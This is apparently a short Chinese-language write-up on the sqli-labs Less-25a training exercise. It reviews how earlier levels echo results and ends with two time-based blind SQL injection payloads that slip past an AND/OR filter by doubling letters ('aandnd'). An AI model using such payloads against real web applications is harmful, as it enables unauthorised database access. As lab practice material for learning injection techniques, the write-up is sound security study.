sqli-labs less25a

#sqli-labs less25a

基于Bool_GET過濾AND/OR數字型_盲注*

0x01. 注入方式與回顯對比（Review）

GET

Less 注入方法 正确回顯 錯誤回顯

1 基于錯誤注入 查詢到的使用者名和密碼 Mysql錯誤資訊

5 雙注入 固定字元串 Mysql錯誤資訊

7 導出檔案注入 固定字元串 另一固定字元串

8 Bool型盲注 固定字元串 無

9 Time型盲注 固定字元串 同一固定字元串

POST

Less 注入方法 成功回顯 失敗回顯 錯誤回顯

11 基于錯誤注入 使用者名和密碼 (flag.jpg) 無 (slap.jpg) Mysql錯誤資訊 (slap.jpg)

13 雙注入 無 (flag.jpg) 無 (slap.jpg) Mysql錯誤資訊 (slap.jpg)

15 Bool/Time型盲注 無 (flag.jpg) 無 (slap.jpg) 無 (slap.jpg)

注意：GET和POST差别在于，GET隻需要送出參數id，而POST則需要username與password都正确。

以上知識摘自https://www.jianshu.com/p/6430aa4ee2b6

這個題目隻是一個需要繞過注入的盲注題，時間注入和布爾盲注，甚至union和報錯注入都可以，不懂可以看我其他的文章

?id=1 aandnd If(ascii(substr(database(),1,1))=90,1,sleep(5))–#

aandnd if((left(database(),1)=‘s’),1,sleep(5))–+

希望大佬可以給個建議，好的我一定采納